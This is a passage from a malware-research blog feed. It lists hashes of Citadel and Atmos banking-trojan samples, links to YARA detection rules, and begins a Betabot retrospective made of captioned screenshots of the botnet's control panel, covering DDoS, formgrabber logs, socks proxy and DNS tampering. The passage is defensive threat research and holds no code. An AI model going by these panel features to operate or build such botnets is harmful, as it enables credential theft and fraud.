8BBFA46A2ADCDF0933876EF920826AB0B02FCC18&lt;br /&gt;
&lt;br /&gt;
Decrypted Citadel plugins:&lt;br /&gt;
B3FDC0DAFA7C0A2076AB4D42317A0E0BAAF3BA78&lt;br /&gt;
0B40F80C025C199F7D940BED572EA08ADE2D52F9&lt;br /&gt;
3B004C68C32C13CAF7F9519B6F7868BF99771F30&lt;br /&gt;
Hidden VNC demo: &lt;a href=&quot;https://www.youtube.com/watch?v=TDOZfalD_LY&quot;&gt;https://www.youtube.com/watch?v=TDOZfalD_LY &lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Atmos package:&lt;br /&gt;
056709A96FE05793B3544ACB4413A9EF827DCEEF&lt;br /&gt;C1B79552B6F770D96B0A0C25C8C8FD87D6D629B9&lt;br /&gt;&lt;br /&gt;
Other samples (not Atmos):&lt;br /&gt;
02FFC98E2B5495E9C760BDA1D855DCA48A754243&lt;br /&gt;
B7AE6D5026C776F123BFC9DAECC07BD872C927B4&lt;br /&gt;
56B58A03ADB175886FBCA449CDB73BE2A82D6FEF&lt;br /&gt;
&lt;br /&gt;
Some other atmos sample (Courtesy of Kafeine):&lt;br /&gt;
8BBFA46A2ADCDF0933876EF920826AB0B02FCC18&lt;br /&gt;
DAABF498242018E3EE16513E2A789D397141C7AC&lt;br /&gt;
04F599D501EA656FB995D1BFA4367F5939631881&lt;br /&gt;
&lt;br /&gt;
You can find my yara rules for mitigating Atmos here: &lt;a href=&quot;https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Atmos.yar&quot;&gt;https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Atmos.yar&lt;/a&gt;&lt;br /&gt;
The Google Chrome injections appear to work from v25.0.1349.2 (2012/12/06), till v43.0.2357.134 (2015/07/14)&lt;br /&gt;
&lt;br /&gt;
Fun thing: I got correlations with a &lt;a href=&quot;http://www.kernelmode.info/forum/viewtopic.php?f=16&amp;amp;t=4138&amp;amp;p=27388#p27388&quot;&gt;CoreBot&lt;/a&gt; sample and their webinjects used.&lt;br /&gt;
ch_new, wf2, cu_main, citi_new, ebay_new, [...]&lt;br /&gt;
Same kind of campaign inside their panels and same custom file names.&lt;br /&gt;
&lt;br /&gt;
if you look for more infos about Citadel, the community did a great work here &lt;a href=&quot;http://www.kernelmode.info/forum/viewtopic.php?f=16&amp;amp;t=1465&quot;&gt;http://www.kernelmode.info/forum/viewtopic.php?f=16&amp;amp;t=1465&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
継続は力なり </description><link>https://www.xylibox.com/2016/02/citadel-0011-atmos.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiW6j4DT0jaXWIumHfBh0MMaHaTvkoV1OvFAAsBF7zmsoycRMH5gKQJoVKPUFziBfDWSKjNhtyMGEKEmMl_xt3exbWl_ehK7JXesMKoxGWwR-BZln34gpHpiFXHwQJuz8afdgxorYmFdMQ/s72-c/2016-02-18_17-29-30.png" height="72" width="72"/><thr:total>20</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-4755907718240540053</guid><pubDate>Wed, 15 Apr 2015 19:19:00 +0000</pubDate><atom:updated>2015-04-16T13:10:57.584+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Betabot</category><category domain="http://www.blogger.com/atom/ns#">Betabot 1.0.2.5</category><category domain="http://www.blogger.com/atom/ns#">Betabot 1.5.0.0</category><category domain="http://www.blogger.com/atom/ns#">Betabot 1.7.0.1</category><category domain="http://www.blogger.com/atom/ns#">Spit Fyre</category><title>Betabot retrospective</title><description>Some of you know Betabot.. if you don&#39;t: &lt;a href=&quot;http://www.ic3.gov/media/2013/130918.aspx&quot;&gt;http://www.ic3.gov/media/2013/130918.aspx&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
1.0.2.5 panel:&lt;br /&gt;
Dashboard:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVkgQ31q7Y0I5Id-mfm_qDC_M2uNz2bRXTOBmIIrhdIVgcUOh-Il0r00dEXRwT56aGcmaw4QcfpEzPzBFDPrz0OmfEnRnCpgShc1tFRbcNfdkYXurIaCs7DWXOdmpy3rUae4MG7UtJtOg/s1600/23-09-2013+22-24-41.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVkgQ31q7Y0I5Id-mfm_qDC_M2uNz2bRXTOBmIIrhdIVgcUOh-Il0r00dEXRwT56aGcmaw4QcfpEzPzBFDPrz0OmfEnRnCpgShc1tFRbcNfdkYXurIaCs7DWXOdmpy3rUae4MG7UtJtOg/s1600/23-09-2013+22-24-41.png&quot; height=&quot;320&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
extended information:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhVl4F0YtD35ZqY-m7EcWRR-jTsR76PRDw11Q18WuaY8fQRm6h5P1mWT6p4ohM09TAWlY-N4R6IRD0-E8baXMBG7VMKAQmRFbJGlwApf4XPDWwWX3TOwYT8YqZf6MLTFCP17Tq3Pf0QRs/s1600/23-09-2013+22-48-21.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhVl4F0YtD35ZqY-m7EcWRR-jTsR76PRDw11Q18WuaY8fQRm6h5P1mWT6p4ohM09TAWlY-N4R6IRD0-E8baXMBG7VMKAQmRFbJGlwApf4XPDWwWX3TOwYT8YqZf6MLTFCP17Tq3Pf0QRs/s1600/23-09-2013+22-48-21.png&quot; height=&quot;242&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Search options:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_jlKW0xvrnFmUxdfOfgjHBOvAAAJ5rGFvljGL1NIf0GrvLFkvG9679McelujOK3KcEp9Y9DlgLuS7AULWzzk6weA2uUciJaZoj4pYbZWmVubaCILKbHFvFglya0u3NEnUqLyS39-h_Vs/s1600/23-09-2013+22-25-11.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_jlKW0xvrnFmUxdfOfgjHBOvAAAJ5rGFvljGL1NIf0GrvLFkvG9679McelujOK3KcEp9Y9DlgLuS7AULWzzk6weA2uUciJaZoj4pYbZWmVubaCILKbHFvFglya0u3NEnUqLyS39-h_Vs/s400/23-09-2013+22-25-11.png&quot; height=&quot;231&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Tasks:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTSxLoer6WHBmmErHFItQBpOT7LS7CraK1CwYa4Kb00o2i2q4SrcxYtgIBD7o0gPyKiiOxrcVRAXjHUM4VruMYHqsWclsO1usZGAKK9IEM9189ztLtdCYrtN4SvRQHVwCw5T5sQsmKSYU/s1600/23-09-2013+22-26-43.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTSxLoer6WHBmmErHFItQBpOT7LS7CraK1CwYa4Kb00o2i2q4SrcxYtgIBD7o0gPyKiiOxrcVRAXjHUM4VruMYHqsWclsO1usZGAKK9IEM9189ztLtdCYrtN4SvRQHVwCw5T5sQsmKSYU/s400/23-09-2013+22-26-43.png&quot; height=&quot;320&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
Remove bot:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEXZRsWcOHFduFCBBfSi2hPDVjEq69WBWmI8tp5PTaU-FTPnh9ODdHAsCE21fCx5Lcy1W8OLrIXvPNbfS5Pc0sZOdIDIHF7QApCT0k5AXYGh08jG8NCO5bmzYnYA4gkPjdHmAL8d85REs/s1600/23-09-2013+22-34-17.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEXZRsWcOHFduFCBBfSi2hPDVjEq69WBWmI8tp5PTaU-FTPnh9ODdHAsCE21fCx5Lcy1W8OLrIXvPNbfS5Pc0sZOdIDIHF7QApCT0k5AXYGh08jG8NCO5bmzYnYA4gkPjdHmAL8d85REs/s400/23-09-2013+22-34-17.png&quot; height=&quot;366&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Terminate bot till next reboot:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj04NeAhKFodEZo2rK0kNC5MMhDz-ShgSn1ppB2lelwpIzNhp9vfA1aaTsUUD07kEfZWIoFApXpmxdFtf746464rDE77tEPSooYM5-13opW5jgDzjcLv3lykl4KOGgfiFyfKNjNs7K9IEg/s1600/23-09-2013+22-33-57.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj04NeAhKFodEZo2rK0kNC5MMhDz-ShgSn1ppB2lelwpIzNhp9vfA1aaTsUUD07kEfZWIoFApXpmxdFtf746464rDE77tEPSooYM5-13opW5jgDzjcLv3lykl4KOGgfiFyfKNjNs7K9IEg/s400/23-09-2013+22-33-57.png&quot; height=&quot;366&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Botkill:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjibaDg6y35UH1lUM_iDAg_rkS12D2lYuKs-SYI2ecBzw9KcEpVc86l4jvmfy3Vt6rUlssOKVXQYLdAo5LjQQv6Rr7RI5hOLlZNHe7g0JhQPZd3ngui0UTTdfE_dRq3rGfgLc0OxDwN5KA/s1600/23-09-2013+22-33-38.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjibaDg6y35UH1lUM_iDAg_rkS12D2lYuKs-SYI2ecBzw9KcEpVc86l4jvmfy3Vt6rUlssOKVXQYLdAo5LjQQv6Rr7RI5hOLlZNHe7g0JhQPZd3ngui0UTTdfE_dRq3rGfgLc0OxDwN5KA/s400/23-09-2013+22-33-38.png&quot; height=&quot;368&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Socks4:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgB_GPJZEND3T3RQAQqf7W3Jvny8ek1pQNtBSkflkZkgJ58A8PrM9-o1pgIhJjYo60xr6c8zQOEfhG-X6OKlqw_DEVDQdJKio1rmba99k9HTnDZMmrUsDowYGSMRB4fMMcr693wR6oWwCY/s1600/23-09-2013+22-33-20.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgB_GPJZEND3T3RQAQqf7W3Jvny8ek1pQNtBSkflkZkgJ58A8PrM9-o1pgIhJjYo60xr6c8zQOEfhG-X6OKlqw_DEVDQdJKio1rmba99k9HTnDZMmrUsDowYGSMRB4fMMcr693wR6oWwCY/s400/23-09-2013+22-33-20.png&quot; height=&quot;398&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Set browser homepage:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOkiCi8Znpg8bX7nVf24dr5T2R35xjtfL3a2jsSgZs-ueDYaABzP59sN0bt1-xEEWVRpelOoYalCHdPuM7krfBC598c7G30uK_e6d8QMRHf1IPOYIuMbBj67jGCRIeLN1PPivs8-2uUvs/s1600/23-09-2013+22-33-01.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOkiCi8Znpg8bX7nVf24dr5T2R35xjtfL3a2jsSgZs-ueDYaABzP59sN0bt1-xEEWVRpelOoYalCHdPuM7krfBC598c7G30uK_e6d8QMRHf1IPOYIuMbBj67jGCRIeLN1PPivs8-2uUvs/s400/23-09-2013+22-33-01.png&quot; height=&quot;358&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Visit URL option:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJy24YDW_Xug2B_YsiNZWQ6lp_aJ-n44BunVt1th4pFF04_uOLyv-Nb83E7GL8zDOL26wLssYiuEFky_idp2krFOoux-VuYX7RZmxUjoLo1sVGp-1H2i0w2yKIdzwD8FgagApLink64Wg/s1600/23-09-2013+22-32-46.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJy24YDW_Xug2B_YsiNZWQ6lp_aJ-n44BunVt1th4pFF04_uOLyv-Nb83E7GL8zDOL26wLssYiuEFky_idp2krFOoux-VuYX7RZmxUjoLo1sVGp-1H2i0w2yKIdzwD8FgagApLink64Wg/s400/23-09-2013+22-32-46.png&quot; height=&quot;366&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Update bot option:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipHOly6bhTxZiAKnLYqd1vGT_yOouwoW_1t7eQzLcfLwt2uU_cJPErI02eSQDrREIorMeiECaHDShTcXP2xCm9gdlAk3VU5dTknImrGk0vnlb0Hf69UzKfZkGdqLoR_m7jdCYCgzqlHXA/s1600/23-09-2013+22-32-31.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipHOly6bhTxZiAKnLYqd1vGT_yOouwoW_1t7eQzLcfLwt2uU_cJPErI02eSQDrREIorMeiECaHDShTcXP2xCm9gdlAk3VU5dTknImrGk0vnlb0Hf69UzKfZkGdqLoR_m7jdCYCgzqlHXA/s400/23-09-2013+22-32-31.png&quot; height=&quot;386&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Download file option:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjO-FvGQKb1e8JNEZ6_RDuTl3eImtGWjClOd4KDJSqkAPHBeoGhVVNQZCRf4aYETyZvxkMGoAZU5RHFEI_12yhuquII24VXxg-DND3jtsBeZJ_3-DD7kqkuU8tPdGlfL7IXxzb6hfn03rg/s1600/23-09-2013+22-32-13.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjO-FvGQKb1e8JNEZ6_RDuTl3eImtGWjClOd4KDJSqkAPHBeoGhVVNQZCRf4aYETyZvxkMGoAZU5RHFEI_12yhuquII24VXxg-DND3jtsBeZJ_3-DD7kqkuU8tPdGlfL7IXxzb6hfn03rg/s400/23-09-2013+22-32-13.png&quot; height=&quot;400&quot; width=&quot;397&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
DDoS cmd option:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1rrvyafTJY_hIudpk_xJtzBjBIIofmu5GJKhZKvpKud1sgplW0BfR_dwe-NkXVqfCNG8D0JZBRgat2-AV7QpgwDfAYHIy8YO7QfNTW1jFzsWfJw52Tv0tmraQwrHf5ZvVrlztduBNFOE/s1600/23-09-2013+22-31-43.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1rrvyafTJY_hIudpk_xJtzBjBIIofmu5GJKhZKvpKud1sgplW0BfR_dwe-NkXVqfCNG8D0JZBRgat2-AV7QpgwDfAYHIy8YO7QfNTW1jFzsWfJw52Tv0tmraQwrHf5ZvVrlztduBNFOE/s400/23-09-2013+22-31-43.png&quot; height=&quot;400&quot; width=&quot;386&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Formgrabber logs:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEHqVlb-IFCqzk070BSuT1dQz4xb-WACkfnIRtpNRvgHdWa80jonofFzjXDavB7vCMV8_b4XtSlb0C-0Yw9ojWuEGpXMlTxNcqV-oXthafgd0V4n73MuQYVR-RvLECW7tN_lch1CY3hsc/s1600/23-09-2013+22-28-53.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEHqVlb-IFCqzk070BSuT1dQz4xb-WACkfnIRtpNRvgHdWa80jonofFzjXDavB7vCMV8_b4XtSlb0C-0Yw9ojWuEGpXMlTxNcqV-oXthafgd0V4n73MuQYVR-RvLECW7tN_lch1CY3hsc/s1600/23-09-2013+22-28-53.png&quot; height=&quot;320&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
logins:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwpSv5Oz0U7MnKHZKvNtCK5CJf0QehrWuXSRtxzs44Gtl5Lw_M7wrgNlNIQnunuPAUZe0ntHex4lIhI6RTX0JOPlbkgzi5_1OmOhhTBXdb-iot6UjLzdIJmTKuQNgYFVoeoWrO4Rofjic/s1600/23-09-2013+22-29-07.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwpSv5Oz0U7MnKHZKvNtCK5CJf0QehrWuXSRtxzs44Gtl5Lw_M7wrgNlNIQnunuPAUZe0ntHex4lIhI6RTX0JOPlbkgzi5_1OmOhhTBXdb-iot6UjLzdIJmTKuQNgYFVoeoWrO4Rofjic/s1600/23-09-2013+22-29-07.png&quot; height=&quot;320&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
users:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIlowmfK_BAjmlO-jj13Jzq7hAnKvb3mxAEHgtIGBCtBEYeGL2xsM5MQx4HFEW-3QMyo6QPQf04f07NPdYZgyQYsCW2t7etQs7q6azWOGOb90HiRZNE13dwJgf9TflZCj7H2zVoeHIHBw/s1600/23-09-2013+22-29-18.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIlowmfK_BAjmlO-jj13Jzq7hAnKvb3mxAEHgtIGBCtBEYeGL2xsM5MQx4HFEW-3QMyo6QPQf04f07NPdYZgyQYsCW2t7etQs7q6azWOGOb90HiRZNE13dwJgf9TflZCj7H2zVoeHIHBw/s400/23-09-2013+22-29-18.png&quot; height=&quot;320&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Settings:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgc-3AW2PK1vEZEogD2U4_dzwprGXEW-YzSHbwDJHyhu_q3zFiRpTenkN6zQG-B6oyrJFBAOcnP9xwS-5T10fobeZ9mpii-VXhlIuS2VJlHDu94alGufsiQklBp_uJ0qVO0jGHQMMs2PWQ/s1600/23-09-2013+22-29-47.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgc-3AW2PK1vEZEogD2U4_dzwprGXEW-YzSHbwDJHyhu_q3zFiRpTenkN6zQG-B6oyrJFBAOcnP9xwS-5T10fobeZ9mpii-VXhlIuS2VJlHDu94alGufsiQklBp_uJ0qVO0jGHQMMs2PWQ/s400/23-09-2013+22-29-47.png&quot; height=&quot;400&quot; width=&quot;362&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
IP blacklist:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCO82cUHu26JLosaafZV5huvaAXV_kaM-LWSFpCHHlUYLdBQ3VLroWJmRmuuFpU7zgV68oOslQ-36boR-cNy3Ovmlvl6d-4Cm1wvz-O_qdzz5mvfrsatWe_AjzgY1FcgD6lIc3oKuPryk/s1600/23-09-2013+22-30-38.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCO82cUHu26JLosaafZV5huvaAXV_kaM-LWSFpCHHlUYLdBQ3VLroWJmRmuuFpU7zgV68oOslQ-36boR-cNy3Ovmlvl6d-4Cm1wvz-O_qdzz5mvfrsatWe_AjzgY1FcgD6lIc3oKuPryk/s400/23-09-2013+22-30-38.png&quot; height=&quot;371&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
List of dns recod to modify:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9VYoNc37K7EftmSYJdpk35XG5l3nL1Khp23oRv0bF_PNtQx50Bkl7j16_1MK3SdM7gNlu3crfyC6AZUSwtY_dD1CzyP-mPTTg0HGWOsap2EUaGwLbSOQ6Qq4J7pa5Ej530BszF5cPsU8/s1600/23-09-2013+22-30-24.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9VYoNc37K7EftmSYJdpk35XG5l3nL1Khp23oRv0bF_PNtQx50Bkl7j16_1MK3SdM7gNlu3crfyC6AZUSwtY_dD1CzyP-mPTTg0HGWOsap2EUaGwLbSOQ6Qq4J7pa5Ej530BszF5cPsU8/s400/23-09-2013+22-30-24.png&quot; height=&quot;371&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
Help:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHcYbWn63s_JF19Sb2WUyjAVM_PMFU3rVgQUhIUtOgFE0-L0ImfEDuOn5S0tdm8DUPfxJ00qvvzr5geHcayBm4jFH9fWwoVnVfn9mdHOISgCTYoUb-Zp5tdjlpHPFULvRiY42uHnh5HBo/s1600/23-09-2013+22-29-58.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHcYbWn63s_JF19Sb2WUyjAVM_PMFU3rVgQUhIUtOgFE0-L0ImfEDuOn5S0tdm8DUPfxJ00qvvzr5geHcayBm4jFH9fWwoVnVfn9mdHOISgCTYoUb-Zp5tdjlpHPFULvRiY42uHnh5HBo/s400/23-09-2013+22-29-58.png&quot; height=&quot;320&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
1.5.0.0:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtfGKtwaWKzXmwH23y3843vooG0uEC-EWQDgjnBKG5SmcwHzz2_pBTDKMjQqf9O7KIBXvO7yapcH2qfwN16Ld9B1lmIiWr_6oNf6xqoTOPRFTJ6JasNgilR7das5kN_oj4s7-ZFR6FQhg/s1600/23-09-2013+22-47-04.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtfGKtwaWKzXmwH23y3843vooG0uEC-EWQDgjnBKG5SmcwHzz2_pBTDKMjQqf9O7KIBXvO7yapcH2qfwN16Ld9B1lmIiWr_6oNf6xqoTOPRFTJ6JasNgilR7das5kN_oj4s7-ZFR6FQhg/s1600/23-09-2013+22-47-04.png&quot; height=&quot;320&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Tasks:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9XCS9_Y5VAaSYvbtHGxt5jIiQK-c3r7ElUAyzGj3PxiuDGDKjHfDcww9uWhi6tiHLPE__46xuk9SMjP7jF1ANhyphenhyphenv2mBLPN1l7cyEN6tD0YeASTg70DJYt1ucHtfVex1U1-21uMsCUZUg/s1600/23-09-2013+22-50-02.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9XCS9_Y5VAaSYvbtHGxt5jIiQK-c3r7ElUAyzGj3PxiuDGDKjHfDcww9uWhi6tiHLPE__46xuk9SMjP7jF1ANhyphenhyphenv2mBLPN1l7cyEN6tD0YeASTg70DJYt1ucHtfVex1U1-21uMsCUZUg/s400/23-09-2013+22-50-02.png&quot; height=&quot;320&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Statistics:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
